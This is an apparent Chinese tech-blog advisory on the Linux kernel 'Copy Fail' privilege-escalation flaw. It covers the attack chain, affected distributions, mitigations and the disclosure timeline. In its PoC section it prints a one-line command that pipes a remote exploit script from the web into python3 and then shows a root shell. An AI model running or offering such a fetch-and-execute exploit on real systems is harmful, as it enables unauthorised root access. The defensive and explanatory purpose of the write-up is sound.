732字节通杀Linux:史诗级漏洞潜伏近十年
🚨 史诗级漏洞:732 字节通杀所有 Linux,近十年潜伏
一个名为“Copy Fail”的 Linux 内核漏洞(CVE-2026-31431)被公开披露:
- 732 字节的 Python 脚本
- 100% 可靠,无需竞态窗口或内核偏移
- 影响所有 Linux 发行版(2017 年至今)
- 容器逃逸原语,跨租户攻击
- 近十年潜伏,直到 2026 年 4 月 29 日公开
同一个脚本在Ubuntu、RHEL、Amazon Linux、SUSE上都有效——无需修改。
🎯 漏洞核心
单一逻辑缺陷
Copy Fail 是一个直线逻辑缺陷:
- 不需要竞态窗口:不像大多数 Linux LPE 需要竞态
- 不需要内核偏移:不需要内核特定的偏移量
- 100% 可靠:每次都成功
- 同一个脚本:在所有发行版上都有效
漏洞链
Copy Fail 的攻击链:
- authencesn 逻辑错误:一个逻辑 bug
- AF_ALG:通过内核 crypto API
- splice():链式调用
- 4 字节 page-cache 写入:最终攻击原语
- 近十年可利用:从 2017 年到补丁发布
📊 受影响范围
官方验证的发行版
| 发行版 | 内核版本 | 状态 |
|---|---|---|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws | ✅ 已验证 |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 | ✅ 已验证 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 | ✅ 已验证 |
| SUSE 16 | 6.12.0-160000.9-default | ✅ 已验证 |
其他受影响发行版
以下发行版同样受影响:
- Debian
- Arch Linux
- Fedora
- Rocky Linux
- AlmaLinux
- Oracle Linux
- 嵌入式 Linux
结论:如果你的内核在 2017 年到补丁之间构建——你受影响。
💡 高危场景
| 场景 | 风险 | 影响 |
|---|---|---|
| 多租户 Linux 主机 | 高 | 任何用户变成 root |
| Kubernetes / 容器集群 | 高 | 跨容器、跨租户攻击 |
| CI Runner / Build Farm | 高 | PR 变成 runner 的 root |
| Cloud SaaS 运行用户代码 | 高 | 租户变成 host root |
| 标准 Linux 服务器 | 中 | 内部 LPE,可链式攻击 |
| 单用户笔记本 | 低 | 后渗透提权步骤 |
🔧 缓解措施
方案 1:更新内核(推荐)
更新内核到包含mainline commit a664bf3d603d的版本:
- 修复内容:撤销 2017 年的 algif_aead in-place 优化
- 效果:page-cache 页面不再出现在可写 destination scatterlist
- 状态:大多数主流发行版已发布补丁
方案 2:禁用 algif_aead 模块(临时)
# 禁用 algif_aead 模块 echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true
禁用 algif_aead 的影响
| 组件 | 影响 |
|---|---|
| dm-crypt / LUKS | 不影响 |
| kTLS / IPsec | 不影响 |
| OpenSSL / SSH | 不影响 |
| AF_ALG 用户空间 | 可能影响 |
结论:对大多数系统,禁用 algif_aead没有明显影响。
方案 3:seccomp 阻止 AF_ALG
对于不受信任的工作负载(容器、沙箱、CI),通过 seccomp 阻止 AF_ALG socket 创建:
# 检查 AF_ALG 使用 lsof | grep AF_ALG ss -xa
🚀 PoC 演示
漏洞 PoC 已公开,供 defenders 验证系统:
快速运行
$ curl https://copy.fail/exp | python3 && su # id uid=0(root) gid=1002(user) groups=1002(user)
PoC 详情
- 文件大小:732 字节
- 语言:Python 3.10+ stdlib only(os, socket, zlib)
- 默认目标:/usr/bin/su
- SHA256:a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
警告:脚本修改 setuid binary 的 page cache;更改重启后不持久,但 root shell 是真实的。不要在生产环境运行。
📅 披露时间线
| 日期 | 事件 |
|---|---|
| 2026-03-23 | 报告给 Linux kernel security team |
| 2026-03-24 | 初始确认 |
| 2026-03-25 | 补丁提议和审核 |
| 2026-04-01 | 补丁提交到 mainline |
| 2026-04-22 | CVE-2026-31431 分配 |
| 2026-04-29 | 公开披露 |
🔍 发现者:Xint Code
漏洞由Xint Code发现:
- 扫描时间:约 1 小时扫描 Linux crypto/ subsystem
- 发现方式:AI 驱动的代码审计
- 完整分析:root cause、diagrams、operator prompt
- 其他发现:同时发现其他高严重性漏洞,仍在协调披露中
Xint Code 战绩
- 0-day RCE:ZeroDay Cloud,扫荡数据库类别(Redis、PostgreSQL、MariaDB)
- DARPA AIxCC Top 3:DARPA AI Cyber Challenge 决赛
- DEF CON CTF 9×:DEF CON CTF 历史最获胜团队
📝 总结
Copy Fail(CVE-2026-31431)是史诗级 Linux 内核漏洞:
- 732 字节通杀所有 Linux(2017 年至今)
- 100% 可靠,单一逻辑缺陷
- 容器逃逸,跨租户攻击
- 近十年潜伏,直到 2026 年 4 月 29 日公开
- 高危场景:多租户主机、容器集群、CI Runner、SaaS
- 缓解:更新内核或禁用 algif_aead
- 发现者:Xint Code,AI 驱动代码审计
近十年的史诗级漏洞,一个脚本通杀所有 Linux。
漏洞官网:https://copy.fail
GitHub PoC:https://github.com/theori-io/copy-fail-CVE-2026-31431
技术分析:https://xint.io/blog/copy-fail-linux-distributions
Kernel 补丁:https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
itadol5j
暂无介绍....
延伸阅读:
Nginx潜伏18年漏洞CVE-2026-42945:原理PoC修复全解析
🚨 Nginx 潜伏 18 年高危漏洞 CVE-2026-42945:原理、PoC 及修复方案2026年5月13日,安全...
GPT-5.5-Cyber独立完成网络攻击:从域名到Shell全自动
🚨 GPT-5.5-Cyber 已能独立完成网络攻击:从域名到 Shell 全自动OpenAI 发布了 GPT-5.5-...
支付宝收钱Skill:AI助手帮你收款
💰 支付宝"收钱"Skill 来了:AI 助手帮你收款支付宝"收钱"Skill来了——这是 OpenClaw 的一个新 ...
腾讯元宝群聊总结:一键提取关键信息
💬 腾讯元宝支持微信群聊一键总结:群聊信息不再漏腾讯元宝(基于腾讯混元大模型)现已支持微信群聊一键总结功能:一键总结:自...
Hermes Agent 2026.05.09 更新
AI Agent 领域再次迎来重要进展。Hermes Agent 在 2026 年 5 月 9 日发布重要更新,带来多项...